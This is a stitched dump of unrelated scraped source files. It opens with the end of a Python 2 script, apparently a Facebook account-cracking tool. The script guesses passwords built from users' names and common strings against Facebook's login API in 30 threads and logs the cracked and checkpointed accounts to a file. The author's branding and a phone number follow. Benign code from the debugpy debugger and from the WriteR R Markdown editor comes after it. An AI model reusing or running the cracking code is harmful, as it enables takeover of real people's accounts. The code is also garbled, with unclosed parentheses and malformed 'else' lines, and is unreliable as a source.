data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password=" + (pass1) + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mHack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;94m✙\x1b[1;95m-' + pass1
oks.append(user + pass1)
else
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user + "|" + pass1 + "\n")
cek.close()
cekpoint.append(user + pass1)
else:
pass2 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password=" + (pass2) + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data
if 'access_token' in q:
print '\x1b[1;91mHack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass2
oks.append(user + pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user + "|" + pass2 + "\n")
cek.close()
cekpoint.append(user + pass2)
else:
pass3 = b['first_name'] + '1122'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password=" + (pass3) + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mHack💉\x1b[1;97m-\x1b[1;94m✙\x1b[1;97m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass3
oks.append(user + pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user + "|" + pass3 + "\n")
cek.close()
cekpoint.append(user + pass3)
else:
pass4 = b['first_name'] + 'ali'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password=" + (pass4) + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mHack💉\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
oks.append(user + pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user + "|" + pass4 + "\n")
cek.close()
cekpoint.append(user + pass4)
else:
pass5 = b['first_name'] + 'khan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password=" + (pass5) + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mHack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass5
oks.append(user + pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user + "|" + pass5 + "\n")
cek.close()
cekpoint.append(user + pass5)
else:
pass6 = '225588'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password=" + (pass6) + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data
if 'access_token' in q:
print '\x1b[1;91mHack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass6
oks.append(user + pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user + "|" + pass6 + "\n")
cek.close()
cekpoint.append(user + pass6)
else:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass7 = b['full_name']
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password=" + (pass7) + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mHack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass7
oks.append(user + pass7
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user + "|" + pass7 + "\n")
cek.close()
cekpoint.append(user + pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;91mibrahim.ash\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"
print " \033[1;93m«---•◈•---Developed By IBRAHIM CHANDIO--•◈•---»" #Dev:IBRAHIM.SH
print '\033[1;91m✅Process Has Been Completed Press➡ Ctrl+Z.↩ Next Type (python2 IBRAHIM)↩\033[1;92m....'
print"\033[1;91mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;91m"+str(len(oks))+"\033[1;97m/\033[1;92m"+str(len(cekpoint))
print """
┈┈┈╲┈┈┈┈╱┈┈┈
┈┈┈╱▔▔▔▔╲┈┈┈
┈┈┃┈▇┈┈▇┈┃┈┈┈
╭╮┣━━━━━━┫╭╮
┃┃┃┈┈┈┈┈┈┃┃┃
╰╯┃┈┈┈┈┈┈┃╰╯
┈┈╰┓┏━━┓┏╯┈┈
┈┈┈╰╯┈┈╰╯┈┈┈
•\033[1;92m◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•.
: \033[1;91m .....chandio brothers ibrahim.ashraf.panra........... \033[1;91m :
•\033[1;92m◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•.'
WhatsApp Num
\033[1;93m +92300923286"""
raw_input("\n\033[1;92m[\033[1;91mBack\033[1;96m]")
menu()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | noreply@github.com |
ceab03c4764ad7cac99e7e1fcadaca2cdc5da95a | 159d4ae61f4ca91d94e29e769697ff46d11ae4a4 | /venv/lib/python3.9/site-packages/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_custom_frames.py | 94cabd744e1d3785ac2a728ff2ac0c584fccdf39 | [
"MIT"
] | permissive | davidycliao/bisCrawler | 729db002afe10ae405306b9eed45b782e68eace8 | f42281f35b866b52e5860b6a062790ae8147a4a4 | refs/heads/main | 2023-05-24T00:41:50.224279 | 2023-01-22T23:17:51 | 2023-01-22T23:17:51 | 411,470,732 | 8 | 0 | MIT | 2023-02-09T16:28:24 | 2021-09-28T23:48:13 | Python | UTF-8 | Python | false | false | 4,397 | py | from _pydevd_bundle.pydevd_constants import get_current_thread_id, Null, ForkSafeLock
from pydevd_file_utils import get_abs_path_real_path_and_base_from_frame
from _pydev_imps._pydev_saved_modules import thread, threading
import sys
from _pydev_bundle import pydev_log
DEBUG = False
class CustomFramesContainer:
# Actual Values initialized later on.
custom_frames_lock = None # : :type custom_frames_lock: threading.Lock
custom_frames = None
_next_frame_id = None
_py_db_command_thread_event = None
def custom_frames_container_init(): # Note: no staticmethod on jython 2.1 (so, use free-function)
CustomFramesContainer.custom_frames_lock = ForkSafeLock()
# custom_frames can only be accessed if properly locked with custom_frames_lock!
# Key is a string identifying the frame (as well as the thread it belongs to).
# Value is a CustomFrame.
#
CustomFramesContainer.custom_frames = {}
# Only to be used in this module
CustomFramesContainer._next_frame_id = 0
# This is the event we must set to release an internal process events. It's later set by the actual debugger
# when we do create the debugger.
CustomFramesContainer._py_db_command_thread_event = Null()
# Initialize it the first time (it may be reinitialized later on when dealing with a fork).
custom_frames_container_init()
class CustomFrame:
def __init__(self, name, frame, thread_id):
# 0 = string with the representation of that frame
self.name = name
# 1 = the frame to show
self.frame = frame
# 2 = an integer identifying the last time the frame was changed.
self.mod_time = 0
# 3 = the thread id of the given frame
self.thread_id = thread_id
def add_custom_frame(frame, name, thread_id):
'''
It's possible to show paused frames by adding a custom frame through this API (it's
intended to be used for coroutines, but could potentially be used for generators too).
:param frame:
The topmost frame to be shown paused when a thread with thread.ident == thread_id is paused.
:param name:
The name to be shown for the custom thread in the UI.
:param thread_id:
The thread id to which this frame is related (must match thread.ident).
:return: str
Returns the custom thread id which will be used to show the given frame paused.
'''
with CustomFramesContainer.custom_frames_lock:
curr_thread_id = get_current_thread_id(threading.current_thread())
next_id = CustomFramesContainer._next_frame_id = CustomFramesContainer._next_frame_id + 1
# Note: the frame id kept contains an id and thread information on the thread where the frame was added
# so that later on we can check if the frame is from the current thread by doing frame_id.endswith('|'+thread_id).
frame_custom_thread_id = '__frame__:%s|%s' % (next_id, curr_thread_id)
if DEBUG:
sys.stderr.write('add_custom_frame: %s (%s) %s %s\n' % (
frame_custom_thread_id, get_abs_path_real_path_and_base_from_frame(frame)[-1], frame.f_lineno, frame.f_code.co_name))
CustomFramesContainer.custom_frames[frame_custom_thread_id] = CustomFrame(name, frame, thread_id)
CustomFramesContainer._py_db_command_thread_event.set()
return frame_custom_thread_id
def update_custom_frame(frame_custom_thread_id, frame, thread_id, name=None):
with CustomFramesContainer.custom_frames_lock:
if DEBUG:
sys.stderr.write('update_custom_frame: %s\n' % frame_custom_thread_id)
try:
old = CustomFramesContainer.custom_frames[frame_custom_thread_id]
if name is not None:
old.name = name
old.mod_time += 1
old.thread_id = thread_id
except:
sys.stderr.write('Unable to get frame to replace: %s\n' % (frame_custom_thread_id,))
pydev_log.exception()
CustomFramesContainer._py_db_command_thread_event.set()
def remove_custom_frame(frame_custom_thread_id):
with CustomFramesContainer.custom_frames_lock:
if DEBUG:
sys.stderr.write('remove_custom_frame: %s\n' % frame_custom_thread_id)
CustomFramesContainer.custom_frames.pop(frame_custom_thread_id, None)
CustomFramesContainer._py_db_command_thread_event.set()
| [
"davidycliao@gmail.com"
] | davidycliao@gmail.com |
ca40ea36db76c942c2481314570c212af410f345 | 5a2cd2517a6738105447909a4e8ecda07bc28647 | /inst/Python/WriteR/WriteR.pyw | 4e52929e0874a977aa0965fa727b6e75e15a5407 | [] | no_license | dewarren/BrailleR | e2f2a948832d94661e4da37cf0c813fda83e7561 | 5517918d36e61aade29e57f4ce706137fc697fed | refs/heads/master | 2020-12-02T06:29:52.684393 | 2017-10-02T01:41:41 | 2017-10-02T01:41:41 | 96,844,078 | 0 | 0 | null | 2017-07-11T02:56:05 | 2017-07-11T02:56:05 | null | UTF-8 | Python | false | false | 42,985 | pyw | # WriteR Version 0.1612.0
# development of this Python version left solely to Jonathan Godfrey from 8 March 2016 onwards
# a C++ version has been proposed for development in parallel, (led by James Curtis).
# cleaning taking place: any line starting with #- suggests a block of redundant code was removed.
# assistance from T.Bilton on 15 April 2016 to think about additions. More to come.
import wx
import sys
# import FileMenuEvents # problems with this one
import EditMenuEvents
import HelpMenuEvents
import MathInserts
import RMarkdownEvents
from wx.py.shell import Shell
from wx.aui import AuiManager, AuiPaneInfo
from threading import Thread, Event
from subprocess import Popen, PIPE, STDOUT
from os.path import join, split, isdir, expanduser, realpath
from os import walk
from time import asctime, sleep
print_option = False
# set up some ID tags
ID_BUILD = wx.NewId()
ID_KNIT2HTML = wx.NewId()
ID_KNIT2PDF = wx.NewId()
ID_SETTINGS = wx.NewId()
ID_FINDONLY = wx.NewId()
ID_FINDREPLACE = wx.NewId()
ID_GOTO = wx.NewId()
ID_WORDCOUNT = wx.NewId()
# symbols menu for mathematical symbols
ID_SYMBOL_INFINITY = wx.NewId()
ID_SYMBOL_MINUSPLUS = wx.NewId()
ID_SYMBOL_PLUSMINUS = wx.NewId()
ID_SYMBOL_TIMES = wx.NewId()
ID_SYMBOL_PARTIAL = wx.NewId()
ID_SYMBOL_LEFTPAREN = wx.NewId()
ID_SYMBOL_RIGHTPAREN = wx.NewId()
ID_SYMBOL_LEFTSQUARE = wx.NewId()
ID_SYMBOL_RIGHTSQUARE = wx.NewId()
ID_SYMBOL_LEFTCURLY = wx.NewId()
ID_SYMBOL_RIGHTCURLY = wx.NewId()
ID_SYMBOL_GRTREQL = wx.NewId()
ID_SYMBOL_LESSEQL = wx.NewId()
ID_SYMBOL_NOTEQL = wx.NewId()
ID_RCOMMAND = wx.NewId()
ID_RCHUNK = wx.NewId()
ID_RGRAPH = wx.NewId()
ID_RPIPE = wx.NewId()
ID_RLASSIGN = wx.NewId()
ID_RRASSIGN = wx.NewId()
ID_SQUAREROOT = wx.NewId()
ID_MATHBAR = wx.NewId()
ID_ABSVAL = wx.NewId()
ID_FRACTION = wx.NewId()
ID_SUMMATION = wx.NewId()
ID_INTEGRAL = wx.NewId()
ID_PRODUCT = wx.NewId()
ID_LIMIT = wx.NewId()
ID_DOUBLESUMMATION = wx.NewId()
ID_DOUBLEINTEGRAL = wx.NewId()
# Greek menu for Greek letters
ID_GREEK_ALPHA = wx.NewId()
ID_GREEK_BETA = wx.NewId()
ID_GREEK_GAMMA = wx.NewId()
ID_GREEK_DELTA = wx.NewId()
ID_GREEK_EPSILON = wx.NewId()
ID_GREEK_VAREPSILON = wx.NewId()
ID_GREEK_ZETA = wx.NewId()
ID_GREEK_ETA = wx.NewId()
ID_GREEK_THETA = wx.NewId()
ID_GREEK_VARTHETA = wx.NewId()
ID_GREEK_IOTA = wx.NewId()
ID_GREEK_KAPPA = wx.NewId()
ID_GREEK_LAMBDA = wx.NewId()
ID_GREEK_MU = wx.NewId()
ID_GREEK_NU = wx.NewId()
ID_GREEK_XI = wx.NewId()
ID_GREEK_OMICRON = wx.NewId()
ID_GREEK_PI = wx.NewId()
ID_GREEK_RHO = wx.NewId()
ID_GREEK_SIGMA = wx.NewId()
ID_GREEK_TAU = wx.NewId()
ID_GREEK_UPSILON = wx.NewId()
ID_GREEK_PHI = wx.NewId()
ID_GREEK_CHI = wx.NewId()
ID_GREEK_PSI = wx.NewId()
ID_GREEK_OMEGA = wx.NewId()
# format menu items
ID_BOLD = wx.NewId()
ID_ITALIC = wx.NewId()
ID_MATH = wx.NewId()
ID_CODE = wx.NewId()
ID_RNDBRK = wx.NewId()
ID_SQBRK = wx.NewId()
ID_CRLBRK = wx.NewId()
ID_BRNDBRK = wx.NewId()
ID_BSQBRK = wx.NewId()
ID_BCRLBRK = wx.NewId()
# IDs for headings
ID_H1 = wx.NewId()
ID_H2 = wx.NewId()
ID_H3 = wx.NewId()
ID_H4 = wx.NewId()
ID_H5 = wx.NewId()
ID_H6 = wx.NewId()
# set up global text strings
SBText = "This program is for editing R Markdown files"
def dcf_dumps(data, sort_keys=True):
string = ""
for k, v in sorted(data.iteritems()):
if v is None: v = 'None'
string += "{:}: {:}\n".format(k, v.replace('\n', '\n '))
return string
def dcf_loads(string):
dictionary = {}
last_key = None
for l in string.split('\n'):
if l == '': continue
elif l[0] == ' ': dictionary[last_key] += "\n{:}".format(l[1:])
else:
k, v = l.split(': ')
if v == 'None': v = None
dictionary[k] = v
last_key = k
return dictionary
def printing(*args):
if print_option: print args
class BashProcessThread(Thread):
def __init__(self, flag, input_list, writelineFunc):
Thread.__init__(self)
self.flag = flag
self.writelineFunc = writelineFunc
self.setDaemon(True)
self.input_list = input_list
printing(input_list)
self.comp_thread = Popen(input_list, stdout=PIPE, stderr=STDOUT)
#- def run(self):
class MyInterpretor(object):
def __init__(self, locals, rawin, stdin, stdout, stderr):
self.introText = "Welcome to stackoverflow bash shell"
self.locals = locals
self.revision = 1.0
self.rawin = rawin
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.more = False
# bash process
self.bp = Popen(['python', '-u', 'test_out.py'], shell=False, stdout=PIPE, stdin=PIPE, stderr=STDOUT)
# start output grab thread
self.outputThread = BashProcessThread(self.bp.stdout.readline)
self.outputThread.start()
# start err grab thread
# self.errorThread = BashProcessThread(self.bp.stderr.readline)
# self.errorThread.start()
#- def getAutoCompleteKeys(self):
#- def getAutoCompleteList(self, *args, **kwargs):
#- def getCallTip(self, command):
#- def push(self, command):
ID_DIRECTORY_CHANGE = wx.NewId()
ID_CRAN = wx.NewId()
ID_R_PATH = wx.NewId()
ID_BUILD_COMMAND = wx.NewId()
ID_KNIT2HTML_COMMAND = wx.NewId()
ID_KNIT2PDF_COMMAND = wx.NewId()
ID_NEWTEXT = wx.NewId()
# get on with the program
class MainWindow(wx.Frame):
def __init__(self, parent=None, id=-1, title="", pos=wx.DefaultPosition,
size=(1200,700), style=wx.DEFAULT_FRAME_STYLE |
wx.SUNKEN_BORDER |
wx.CLIP_CHILDREN, filename="untitled.Rmd"):
super(MainWindow, self).__init__(parent, id, title, pos, size, style)
self.Bind(wx.EVT_CLOSE, self.OnClose)
self._mgr = AuiManager()
self._mgr.SetManagedWindow(self)
self.ChosenFontSize = 14
self.font = wx.Font(self.ChosenFontSize, wx.MODERN, wx.NORMAL, wx.NORMAL, False, u'Consolas')
self.settingsFile = "WriteROptions"
self.settings = {#'dirname': 'none',
# 'templates': 'none',
'lastdir': '.',
'filename': 'none',
'newText': "Use WriteR to edit your R markdown files, perhaps by starting from a template file",
'RDirectory': self.GetRDirectory()}
self.settings = self.getSettings(self.settingsFile, self.settings)
if len(sys.argv) > 1:
self.settings['lastdir'], self.settings['filename'] = split(realpath(sys.argv[-1]))
self.filename = self.settings['filename']
self.dirname = self.settings['lastdir']
self.CreateExteriorWindowComponents()
self.CreateInteriorWindowComponents()
self.fileOpen(self.dirname, self.filename)
elif self.settings['filename'] == 'none':
self.filename = filename
self.dirname = self.settings['lastdir']
self.CreateExteriorWindowComponents()
self.CreateInteriorWindowComponents()
self.OnOpen(self)
# set the save flag to true if OnOpen is cancelled
else:
self.filename = self.settings['filename']
self.dirname = self.settings['lastdir']
self.CreateExteriorWindowComponents()
self.CreateInteriorWindowComponents()
self.fileOpen(self.dirname, self.filename)
printing(self.settings['RDirectory'])
self.x = 0
# create a flag for exiting subthreads
self.sub_flag = Event()
self.comp_thread = None
# for find and find/replace dialogues we need...
self.Bind(wx.EVT_FIND, self.OnFind)
self.Bind(wx.EVT_FIND_NEXT, self.OnFind)
self.Bind(wx.EVT_FIND_REPLACE, self.OnFind)
self.Bind(wx.EVT_FIND_REPLACE_ALL, self.OnFind)
self.Bind(wx.EVT_FIND_CLOSE, self.OnFindClose)
def CreateInteriorWindowComponents(self):
self.editor = self.CreateTextCtrl(self.settings['newText'])
self.console = self.CreateTextCtrl("")
self.console.SetEditable(False)
self._mgr.AddPane(self.console, AuiPaneInfo().Name("console")
.Caption("Console").Bottom().Layer(1).Position(1).CloseButton(True)
.MinimizeButton(True).Hide())
self._mgr.AddPane(self.editor, AuiPaneInfo().Name('editor').
CenterPane().Hide())
self._mgr.GetPane("console").Hide().Bottom().Layer(0).Row(0).Position(0)
self._mgr.GetPane("editor").Show()
self.editor.SetFocus()
self.editor.SelectAll()
self._mgr.Update()
# self.control = wx.TextCtrl(self, style=wx.TE_MULTILINE)
def CreateExteriorWindowComponents(self):
self.CreateMenu()
self.StatusBar()
self.SetTitle()
def CreateMenu(self):
fileMenu = wx.Menu()
for id, label, helpText, handler in \
[(wx.ID_NEW, "New file\tCtrl+N", "Start a new file", self.OnNewFile),
(wx.ID_OPEN, "&Open\tCtrl+O", "Open an existing file", self.OnOpen),
(wx.ID_SAVE, "&Save\tCtrl+S", "Save the current file", self.OnSave),
(wx.ID_SAVEAS, "Save &As\tCtrl+Shift+S", "Save the file under a different name", self.OnSaveAs),
(None,) * 4,
(wx.ID_EXIT, "Quit && save\tCtrl+Q", "Saves the current file and closes the program", self.OnSafeExit)]:
if id == None:
fileMenu.AppendSeparator()
else:
item = fileMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
menuBar = wx.MenuBar() # create the menu bar object
menuBar.Append(fileMenu, "&File") # Add the fileMenu to the MenuBar
editMenu = wx.Menu()
for id, label, helpText, handler in \
[(wx.ID_CUT, "Cu&t\tCtrl+X", "Cut highlighted text to clipboard", self.OnCut),
(wx.ID_COPY, "&Copy\tCtrl+C", "Copy highlighted text to clipboard", self.OnCopy),
(wx.ID_PASTE, "&Paste\tCtrl+V", "Paste text from clipboard", self.OnPaste),
(wx.ID_SELECTALL, "Select all\tCtrl+A", "Highlight entire text", self.OnSelectAll),
(wx.ID_DELETE, "&Delete", "Delete highlighted text", self.OnDelete),
(ID_WORDCOUNT, "Word count (broken)\tCtrl+w", "get a word count of the entire text", self.OnWordCount),
(None,) * 4,
(ID_FINDONLY, "Find\tCtrl+F", "Open a standard find dialog box", self.OnShowFindToFix),
(ID_GOTO, "Go to line (broken)\tCtrl+g", "Open a dialog box to choose a line number", self.OnGoToLine),
(ID_FINDREPLACE, "Find/replace\tCtrl+H", "Open a find/replace dialog box", self.OnShowFindReplaceToFix),
(None,) * 4,
(ID_SETTINGS, 'Settings', "Setup the editor to your liking", self.OnSettings)]:
if id == None:
editMenu.AppendSeparator()
else:
item = editMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
menuBar.Append(editMenu, "&Edit") # Add the editMenu to the MenuBar
viewMenu = wx.Menu()
self.ShowStatusBar = viewMenu.Append(wx.ID_ANY, "Show status bar",
"Show Status bar", kind=wx.ITEM_CHECK)
viewMenu.Check(self.ShowStatusBar.GetId(), True)
self.Bind(wx.EVT_MENU, self.ToggleStatusBar, self.ShowStatusBar)
self.IncreaseFont = viewMenu.Append(wx.ID_ANY, "Increase the font size\tCtrl+=", "Increase the font size")
self.Bind(wx.EVT_MENU, self.OnIncreaseFontSize, self.IncreaseFont)
self.DecreaseFont = viewMenu.Append(wx.ID_ANY, "Decrease the font size\tCtrl+-", "Decrease the font size")
self.Bind(wx.EVT_MENU, self.OnDecreaseFontSize, self.DecreaseFont)
self.ChooseFont = viewMenu.Append(wx.ID_ANY, "Choose font\tCtrl+D", "Choose the font size and other details")
self.Bind(wx.EVT_MENU, self.OnSelectFont, self.ChooseFont )
menuBar.Append(viewMenu, "View") # Add the view Menu to the MenuBar
buildMenu = wx.Menu()
self.Render = buildMenu.Append(wx.ID_ANY, "Render the document\tF5", "Use the rmarkdown package to render the document into the chosen format")
self.Bind(wx.EVT_MENU, self.OnRenderNull, self.Render)
# Create render menu
renderMenu = wx.Menu()
self.ChooseRenderNull = renderMenu.Append(wx.ID_ANY, "Render using defaults", "Use the rmarkdown package and render function to create HTML or only the first of multiple formats specified in YAML header", wx.ITEM_RADIO)
self.Bind(wx.EVT_MENU, self.OnSelectRenderNull, self.ChooseRenderNull)
self.ChooseRenderHtml = renderMenu.Append(wx.ID_ANY, "Render into HTML only", "Use the rmarkdown package and render function to create HTML", wx.ITEM_RADIO)
self.Bind(wx.EVT_MENU, self.OnSelectRenderHtml, self.ChooseRenderHtml)
self.ChooseRenderWord = renderMenu.Append(wx.ID_ANY, "Render into Microsoft Word only", "Use the rmarkdown package and render function to create Microsoft Word", wx.ITEM_RADIO)
self.Bind(wx.EVT_MENU, self.OnSelectRenderWord, self.ChooseRenderWord)
self.ChooseRenderSlidy = renderMenu.Append(wx.ID_ANY, "Render into slidy only", "Use the rmarkdown package and render function to create a slidy presentation", wx.ITEM_RADIO)
self.Bind(wx.EVT_MENU, self.OnSelectRenderSlidy, self.ChooseRenderSlidy)
self.ChooseRenderPdf = renderMenu.Append(wx.ID_ANY, "Render into pdf only", "Use the rmarkdown package and render function to create pdf", wx.ITEM_RADIO)
self.Bind(wx.EVT_MENU, self.OnSelectRenderPdf, self.ChooseRenderPdf)
self.ChooseRenderAll = renderMenu.Append(wx.ID_ANY, "Render into all specified formats", "Use the rmarkdown package and render function to create multiple output documents", wx.ITEM_RADIO)
self.Bind(wx.EVT_MENU, self.OnSelectRenderAll, self.ChooseRenderAll)
buildMenu.AppendMenu(-1, "Set render process to...", renderMenu) # Add the render Menu as a submenu to the build menu
for id, label, helpText, handler in \
[
(ID_KNIT2HTML, "Knit to html\tF6", "Knit the script to HTML", self.OnKnit2html),
(ID_KNIT2PDF, "Knit to pdf\tShift+F6", "Knit the script to a pdf file using LaTeX", self.OnKnit2pdf)]:
if id == None:
buildMenu.AppendSeparator()
else:
item = buildMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
menuBar.Append(buildMenu, "Build") # Add the Build Menu to the MenuBar
insertMenu = wx.Menu()
AddHeadBlock = insertMenu.Append(-1, "header/preamble\tCtrl+Shift+H")
self.Bind(wx.EVT_MENU, self.OnAddHeadBlock, AddHeadBlock)
AddURL = insertMenu.Append(-1, "URL\tCtrl+Shift+U")
self.Bind(wx.EVT_MENU, self.OnAddURL, AddURL)
AddEMail = insertMenu.Append(-1, "e-mail\tCtrl+Shift+E")
self.Bind(wx.EVT_MENU, self.OnAddEMail, AddEMail)
AddFigure = insertMenu.Append(-1, "Figure\tCtrl+Shift+F")
self.Bind(wx.EVT_MENU, self.OnAddFigure, AddFigure)
AddReference = insertMenu.Append(-1, "Reference\tCtrl+Shift+R")
self.Bind(wx.EVT_MENU, self.OnAddReference, AddReference)
headingsMenu = wx.Menu()
for id, label, helpText, handler in \
[
(ID_H1, "level &1\tAlt+1", "insert heading level 1", self.OnHeading1),
(ID_H2, "level &2\tAlt+2", "insert heading level 2", self.OnHeading2),
(ID_H3, "level &3\tAlt+3", "insert heading level 3", self.OnHeading3),
(ID_H4, "level &4\tAlt+4", "insert heading level 4", self.OnHeading4),
(ID_H5, "level &5\tAlt+5", "insert heading level 5", self.OnHeading5),
(ID_H6, "level &6\tAlt+6", "insert heading level 6", self.OnHeading6)]:
if id == None:
headingsMenu.AppendSeparator()
else:
item = headingsMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
insertMenu.AppendMenu(-1, "Heading", headingsMenu)
menuBar.Append(insertMenu, "Insert") # Add the Insert Menu to the MenuBar
formatMenu = wx.Menu()
for id, label, helpText, handler in \
[
(ID_BOLD, "Bold\tCtrl+B", "move to bold face font", self.OnBold),
(ID_ITALIC, "Italic\tCtrl+I", "move to italic face font", self.OnItalic),
(ID_CODE, "Code\tCtrl+`", "present using a typewriter font commonly seen when showing code", self.OnCode),
(ID_MATH, "Maths mode\tCtrl+4", "move text to maths mode", self.OnMath),
(ID_RNDBRK, "Round brackets\tAlt+Shift+(", "Wrap text in round () brackets", self.OnRoundBrack),
(ID_SQBRK, "Square brackets\tAlt+[", "Wrap text in square brackets", self.OnSquareBrack),
(ID_CRLBRK, "Curly brackets\tAlt+Shift+{", "Wrap text in curly brackets", self.OnCurlyBrack),
(ID_BRNDBRK, "Round brackets (math)\tAlt+Shift+)", "Wrap math in round () brackets", self.OnMathRoundBrack),
(ID_BSQBRK, "Square brackets (math)\tAlt+]", "Wrap math in square brackets", self.OnMathSquareBrack),
(ID_BCRLBRK, "Curly brackets (math)\tAlt+Shift+}", "Wrap math in curly brackets", self.OnMathCurlyBrack)]:
if id == None:
formatMenu.AppendSeparator()
else:
item = formatMenu.Append(id, label, helpText)
self.Bind(wx.EVT_MENU, handler, item)
menuBar.Append(formatMenu, "F&ormat") # Add the format Menu to the MenuBar
mathsMenu = wx.Menu()
symbolsMenu = wx.Menu()
for id, label, helpText, handler in \
[
(ID_SYMBOL_INFINITY, "infinity\tCtrl+Shift+I", "insert infinity", self.OnSymbol_infinity),
(ID_SYMBOL_TIMES, "times\tCtrl+Shift+*", "insert times", self.OnSymbol_times),
(ID_SYMBOL_PARTIAL, "partial derivative\tCtrl+Shift+D", "insert partial", self.OnSymbol_partial),
(ID_SYMBOL_PLUSMINUS, "plus or minus\tCtrl+Shift+=", "insert plus or minus sign", self.OnSymbol_plusminus),
